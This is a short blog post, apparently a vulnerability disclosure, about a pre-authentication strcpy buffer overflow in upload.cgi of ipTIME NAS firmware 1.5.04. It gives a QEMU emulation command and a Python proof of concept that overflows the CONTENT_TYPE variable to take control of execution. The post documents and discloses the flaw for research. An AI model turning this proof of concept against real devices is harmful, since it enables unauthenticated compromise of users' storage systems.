Buffer Overflow in upload.cgi of iptime_nas_1.5.04

Buffer Overflow in upload.cgi of iptime_nas_1.5.04

The principle of the vulnerability

It can be observed that the vulnerability is caused by strcpy. Since the authentication logic is executed after the strcpy operation, this constitutes a pre-authentication vulnerability.

image-20250425112559057

image-20250425112609126

Use QEMU for simulation

1
command = f'sudo chroot . ./qemu-arm-static -L ./lib -g 1234 ./usr/webroot/upload.cgi'

poc:

1
2
3
4
5
6
7
8
9
10
11
12
import os


count_ones = 5000
content_type_value = 'A' * count_ones


command = f'sudo chroot . ./qemu-arm-static -L ./lib -g 1234 -E CONTENT_TYPE={content_type_value} ./usr/webroot/upload.cgi'


os.system(command)

The result of the attack.

It can be seen that the stack space allocated by V8 is 08h.

image-20250425112843647

409f26874d89240514a94b25cce067c2

505bded03ba362093859cf7293904187

7ddfa109889f3cb0ce68b3c4388b4a2c

Eventually, the overflow reaches 0xd0, and the execution flow of the program is controlled. If necessary, more overflow can be achieved.

#cve
Buffer Overflow in upload.cgi of iptime_nas_1.5.04
https://lafdrew.github.io/2025/04/25/Buffer-Overflow-in-upload-cgi-of-iptime-nas-1-5-04/
Author
John Doe
Posted on
April 25, 2025
Licensed under